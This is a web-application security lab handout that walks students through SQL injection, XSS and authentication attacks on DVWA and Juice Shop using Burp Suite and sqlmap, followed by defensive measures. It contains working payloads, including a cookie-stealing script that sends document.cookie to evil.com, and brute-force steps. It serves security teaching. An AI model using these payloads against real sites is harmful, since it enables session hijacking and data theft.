🔥 Web Application Security & Exploitation Lab
1️⃣ Setting Up the Lab
Install the Necessary Tools
- Burp Suite Community Edition → Download here
- OWASP ZAP → Download here
- SQLMap (Command-line tool, install via
pip
):pip install sqlmap
- Vulnerable Web Application (Choose One)
- DVWA (Damn Vulnerable Web App) → Install on a local VM (Apache + PHP).
- OWASP Juice Shop → Easy setup using Docker:
docker run -d -p 3000:3000 bkimminich/juice-shop
2️⃣ SQL Injection Attack
SQL Injection (SQLi) allows attackers to extract data from a database.
Step 1: Identify a Vulnerable Input Field
- Open Burp Suite and turn on Intercept Mode.
- Enter a username and password in a login form, then capture the request.
- Modify the request with a simple SQLi payload:
' OR '1'='1' --
- Forward the request and see if you get unauthorized access.
Step 2: Automate SQL Injection with SQLMap
Run SQLMap against a vulnerable parameter:
sqlmap -u "http://target.com/login.php?user=admin" --dbs
- This command will extract database names if the input is vulnerable.
3️⃣ Cross-Site Scripting (XSS) Attack
XSS attacks allow injecting JavaScript into vulnerable web pages.
Step 1: Find a Comment or Search Field
- In DVWA, go to the XSS (Stored) section.
- Submit this script as a comment:
<script>alert('Hacked!');</script>
- If vulnerable, every visitor will see the JavaScript alert box.
Step 2: Perform XSS via Burp Suite
- Capture a search request in Burp Suite.
- Modify the search query to inject:
<img src=x onerror=alert('XSS')>
- If the input isn’t sanitized, the JavaScript executes in the victim’s browser.
4️⃣ Authentication Bypass Attack
Many websites store session tokens in cookies, which can be stolen.
Step 1: Steal a User’s Cookie
- Inject this script into a comment field:
<script>document.location='http://evil.com/steal.php?cookie='+document.cookie</script>
- The attacker receives the victim’s authentication cookie.
- Use the stolen cookie to log in as the victim.
Step 2: Test for Weak Authentication
- Try default credentials (e.g.,
admin:admin
orroot:password
). - If the site lacks rate limiting, use Burp Suite’s Intruder tool to brute-force login attempts.
🔐 Defensive Measures
After exploiting these vulnerabilities, we must understand how to prevent them.
✅ Preventing SQL Injection:
- Use prepared statements in SQL queries.
- Implement Web Application Firewalls (WAFs) to block malicious requests.
✅ Preventing XSS Attacks:
- Always sanitize user inputs before storing them.
- Use Content Security Policy (CSP) to restrict script execution.
✅ Preventing Authentication Attacks:
- Implement Multi-Factor Authentication (MFA).
- Store session tokens securely (HTTPOnly & Secure flags).
📌 Conclusion
This lab teaches you real-world penetration testing skills for web application security. By completing this, you’ve learned:
✅ How attackers exploit SQL injection and XSS vulnerabilities.
✅ How to manipulate web requests using Burp Suite.
✅ How to steal session tokens and bypass authentication.
✅ How to defend against web-based attacks.
📤 Submission Instructions
- Submit screenshots or a detailed report explaining:
✅ How you exploited each vulnerability
✅ The impact of the attack
✅ Steps to mitigate the issue
🚀 Next Steps:
- Try testing real-world bug bounty challenges at Hack The Box or PortSwigger’s Web Security Academy.